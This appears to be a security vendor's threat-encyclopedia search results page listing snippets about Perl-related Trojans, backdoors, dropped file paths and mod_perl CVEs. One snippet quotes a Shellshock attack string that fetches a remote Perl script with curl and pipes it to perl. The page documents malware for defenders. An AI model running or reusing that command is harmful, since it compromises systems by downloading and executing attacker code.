Keyword: usojan.perl.malxmr.uwejs
393 Total Search   |   Showing Results : 1 - 20
   Next  
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan may be downloaded by other malware/grayware from remote sites. It deletes itself after execution. Arrival Details This Trojan may be downloaded by the following malware/grayware from
affected system's memory: perl sparky.sh pscan2 Information Theft This Trojan gathers the following account information: User Name System Date and Time Current Working Directory Number of Processing Units
This Trojan may be downloaded by other malware/grayware from remote sites. It requires its main component to successfully perform its intended routine. It deletes itself after execution. Arrival
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be downloaded by other malware/grayware from
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
Root%\Perl\html\lib\File\HomeDir\Darwin\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\Hash\Util\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\Perl\Critic\Policy\70ef97a470ef9043516.lock
Root%\Documents and Settings\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\Capture\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\DBD\Gofer\70ef97a470ef9043516.lock %System Root%\Perl\html
Root%\Perl\bin\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\Eval\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\Module\Load\70ef97a470ef9043516.lock %System Root%\Perl\html\lib\ExtUtils
CVE-2007-1349 PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This backdoor arrives on a system as a
\PDFCreator\PlugIns\pdfforge %Program Files%\PDFCreator\COM %Program Files%\PDFCreator\GS9.04\gs9.04\Bin %Program Files%\PDFCreator\COM\Perl %Program Files%\PDFCreator\COM\Windows Scripting Host\JScripts
allows remote attackers to inject arbitrary web script or HTML via the URI. Apache Mod Perl 2,Apache Mod Perl 1 Apply associated Trend Micro DPI Rules. 1000552| 1000552 - Generic Cross Site Scripting(XSS)
arrives via the following means: BashBug/Shellshock / CVE-2014-6271 --> ( :;); /bin/bash -c "curl hxxp://r.cc.st/bc.pl | perl" Backdoor Routine This backdoor executes the following commands from a remote
Scripts\How To\PdfSignatureSettings.js %Program Files%\PDFCreator\COM Scripts\Perl\BackgroundPage.pl %Program Files%\PDFCreator\COM Scripts\Perl\CoverPage.pl %Program Files%\PDFCreator\COM Scripts\Perl
This Backdoor arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded
This malware figures in a Shellshock-related SMTP attack. To get a one-glance comprehensive view of the behavior of this Backdoor, refer to the Threat Diagram shown below. This Backdoor arrives on a
Files%\PDFCreator\COM\MS Office %Program Files%\PDFCreator\COM\Perl %Program Files%\PDFCreator\COM\Python %Program Files%\PDFCreator\COM\Ruby %Program Files%\PDFCreator\COM\VB6 %Program Files%\PDFCreator
This backdoor connects to Internet Relay Chat (IRC) servers. It executes commands from a remote malicious user, effectively compromising the affected system. Arrival Details This backdoor may be
This backdoor may arrive bundled with malware packages as a malware component. It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting